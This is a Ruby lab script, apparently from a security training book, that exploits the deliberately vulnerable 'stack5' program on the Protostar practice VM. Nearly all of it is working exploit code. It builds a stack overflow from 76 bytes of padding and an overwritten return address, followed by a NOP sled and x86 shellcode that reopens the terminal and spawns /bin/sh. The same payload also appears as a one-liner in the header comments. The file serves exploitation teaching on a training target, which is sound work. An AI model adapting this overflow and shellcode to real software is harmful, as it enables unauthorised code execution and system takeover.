#!/usr/bin/env ruby
# -*- coding: binary -*-
# ========================================================= #
# This file is a part of { Black Hat Ruby } book lab files. #
# ========================================================= #
#
# Author:
#   Sabri Hassanyah | @KINGSABRI
# Description:
#   Exploiting the vulnerable application "stack5" from the Protostar (v2) machine
#   Download: https://www.vulnhub.com/entry/exploit-exercises-protostar-v2,32/
#   Writeup: https://simonuvarov.com/protostar-stack5/
# Requirements:
#   Before executing the exploit, make sure your shell is bash: on Protostar "sh" is the default, and under it the exploit will not work as expected.
#   $ ruby -e "system('/bin/bash -i 2>&1')"
# 

# Equivalent one-liner, executed directly from the terminal (the trailing ";cat;" is shell syntax, not part of the payload):
# (ruby -e 'print "A" * 76 + [0xbffff6c0].pack("V") + "\x90" * 10 + "\x31\xc0\x31\xdb\xb0\x06\xcd\x80\x53\x68/tty\x68/dev\x89\xe3\x31\xc9\x66\xb9\x12\x27\xb0\x05\xcd\x80\x31\xc0\x50\x68//sh\x68/bin\x89\xe3\x50\x53\x89\xe1\x99\xb0\x0b\xcd\x80"';cat;) | /opt/protostar/bin/stack5

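# Build the stack5 overflow payload and write it, as raw bytes, to stdout.
#
# Layout (from the writeup linked above): 76 bytes of buffer/saved registers,
# then the saved return address, then a NOP sled and the shellcode it lands on.
#
# The return address is a fixed stack address that only holds on the Protostar
# VM with ASLR off, and it shifts with the environment/argv size of the
# process; re-derive it with gdb if the exploit segfaults. It can be overridden
# without editing the file:   STACK5_RET=0xbffff6c0 ruby stack5.rb
#
# Usage:  (ruby stack5.rb; cat) | /opt/protostar/bin/stack5
# The trailing cat keeps the writing side of the pipe open after the payload.
ret_addr = Integer(ENV.fetch("STACK5_RET", "0xbffff6c0"), 16)
# pack("V") silently truncates to 32 bits; an oversized override is a mistake.
raise "STACK5_RET must fit in 32 bits" unless (0..0xffffffff).cover?(ret_addr)

junk    = "A" * 76                 # filler up to the saved-EIP slot
eip     = [ret_addr].pack("V")     # saved EIP, little-endian 32-bit
nops    = ("\x90" * 10).b          # small sled so the address needs only be close
# Linux/x86 shellcode decoded below: close(0); open("/dev/tty", 0x2712);
# execve("/bin//sh", ["/bin//sh"], NULL). Reopening fd 0 on the controlling
# tty is what makes the spawned shell usable even though stack5's stdin is
# the pipe that carried this payload. `.b` keeps the bytes opaque regardless
# of the source encoding in effect.
payload = ("\x31\xc0\x31\xdb\xb0\x06\xcd" +   # xor eax,eax; xor ebx,ebx; mov al,6 (close)
           "\x80\x53\x68/tty\x68/dev\x89" +   # int 0x80; push ebx; push "/tty"; push "/dev"
           "\xe3\x31\xc9\x66\xb9\x12\x27" +   # mov ebx,esp; xor ecx,ecx; mov cx,0x2712
           "\xb0\x05\xcd\x80\x31\xc0\x50" +   # mov al,5 (open); int 0x80; xor eax,eax; push eax
           "\x68//sh\x68/bin\x89\xe3\x50" +   # push "//sh"; push "/bin"; mov ebx,esp; push eax
           "\x53\x89\xe1\x99\xb0\x0b\xcd\x80" # push ebx; mov ecx,esp; cdq; mov al,11 (execve); int 0x80
          ).b
exploit = junk + eip + nops + payload

# Only the payload goes to stdout: the ";cat;" of the shell one-liner is shell
# syntax and must not be sent as part of the overflow. Binary mode prevents any
# transcoding or newline translation of the raw bytes.
$stdout.binmode
$stdout.write(exploit)
$stdout.flush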
